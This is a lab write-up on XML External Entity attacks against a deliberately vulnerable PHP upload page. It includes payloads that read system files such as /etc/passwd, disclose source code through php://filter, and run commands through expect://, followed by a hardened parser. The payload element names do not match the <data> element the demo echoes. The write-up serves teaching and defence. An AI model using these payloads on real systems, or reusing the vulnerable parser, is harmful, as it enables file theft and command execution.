Lab - XML eXternal Entity Attack
Source: Internet  Editor: 程序博客网  Time: 2024/06/06 03:24
Prepare
Lab
Linux kali 3.14-kali1-686-pae
Requirements
# apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5
Demo Code
<html>
<body>
<h1>Process XML</h1>
<form action="" method="post" enctype="multipart/form-data">
  <label for="file">Archive XML:</label>
  <input type="file" name="file" id="file">
  <input type="submit" name="submit" value="submit"><br />
</form>
<hr>
<h1>Results</h1>
<?php
# error_reporting(E_ALL);
# ini_set("display_errors", 1);

if ( isset($_FILES["file"]) ) {
    // Deliberately vulnerable for the lab: the uploaded file is parsed
    // with DTD processing enabled and no restriction on entities.
    $doc = new DOMDocument();
    $doc->validateOnParse = true;
    $doc->load($_FILES["file"]["tmp_name"]);

    // Only the text of <data> elements is echoed back, unescaped.
    $tags = $doc->getElementsByTagName("data");
    foreach($tags as $tag) {
        echo "<pre>" . $tag->nodeValue . "</pre>\n";
    }
} else {
    echo "invalid xml format";
}
?>
</body>
</html>
Exploit
Windows
File Inclusion
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [
  <!ENTITY message SYSTEM "file:///C:/Windows/win.ini">
]>
<xxx>&message;</xxx>
Source Disclosure
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [
  <!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">
]>
<xxx>&message;</xxx>
Linux
File Inclusion
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [
  <!ENTITY hello SYSTEM "file:///etc/passwd">
]>
<somexml><message>&hello;</message></somexml>
Source Disclosure
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [
  <!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">
]>
<somexml><message>&hello;</message></somexml>
Command Execution
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [
  <!ENTITY hello SYSTEM "expect://dir">
]>
<somexml><message>&hello;</message></somexml>
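A hardened counterpart to the Demo Code, added here as an example and not part of the original lab: it parses the upload without DTD validation or entity substitution and refuses any document that carries a DOCTYPE, which is what every payload above depends on. The helper name parse_untrusted_xml() and the 64 KiB size limit are assumptions of this example.

```php
<?php
// Added example, not the lab's code. parse_untrusted_xml() and the 64 KiB
// limit are assumptions made for this example.
function parse_untrusted_xml($xml)
{
    if (!is_string($xml) || $xml === '' || strlen($xml) > 65536) {
        throw new RuntimeException('empty or oversized input');
    }
    // PHP < 8.0 may sit on libxml2 < 2.9, which resolves external entities
    // by default, so the entity loader is switched off around the parse.
    $legacy = PHP_VERSION_ID < 80000;
    $prevLoader = $legacy ? libxml_disable_entity_loader(true) : null;
    $prevErrors = libxml_use_internal_errors(true);

    $doc = new DOMDocument();
    // Unlike the demo: no validateOnParse, no LIBXML_NOENT, no LIBXML_DTDLOAD.
    // loadXML() on a string is used because load() on a path fails once the
    // entity loader is disabled. LIBXML_NONET blocks network fetches.
    $ok = $doc->loadXML($xml, LIBXML_NONET);

    libxml_clear_errors();
    libxml_use_internal_errors($prevErrors);
    if ($legacy) {
        libxml_disable_entity_loader($prevLoader);
    }
    if (!$ok) {
        throw new RuntimeException('not well-formed XML');
    }
    // The upload format needs no DTD, so any DOCTYPE is refused outright.
    foreach ($doc->childNodes as $node) {
        if ($node->nodeType === XML_DOCUMENT_TYPE_NODE) {
            throw new RuntimeException('DOCTYPE not allowed');
        }
    }
    return $doc;
}

if (isset($_FILES['file']) && is_uploaded_file($_FILES['file']['tmp_name'])) {
    try {
        // Read at most one byte past the limit so oversized files are rejected.
        $xml = file_get_contents($_FILES['file']['tmp_name'], false, null, 0, 65537);
        $doc = parse_untrusted_xml($xml);
        foreach ($doc->getElementsByTagName('data') as $tag) {
            // Escape on output; the demo echoed node text as raw HTML.
            echo '<pre>' . htmlspecialchars($tag->nodeValue, ENT_QUOTES, 'UTF-8') . "</pre>\n";
        }
    } catch (Exception $e) {
        echo 'invalid xml format';
    }
}
```

If the expect wrapper used by the Command Execution payload is not needed on the server, removing the libexpect-php5 package installed under Requirements takes that wrapper away as well.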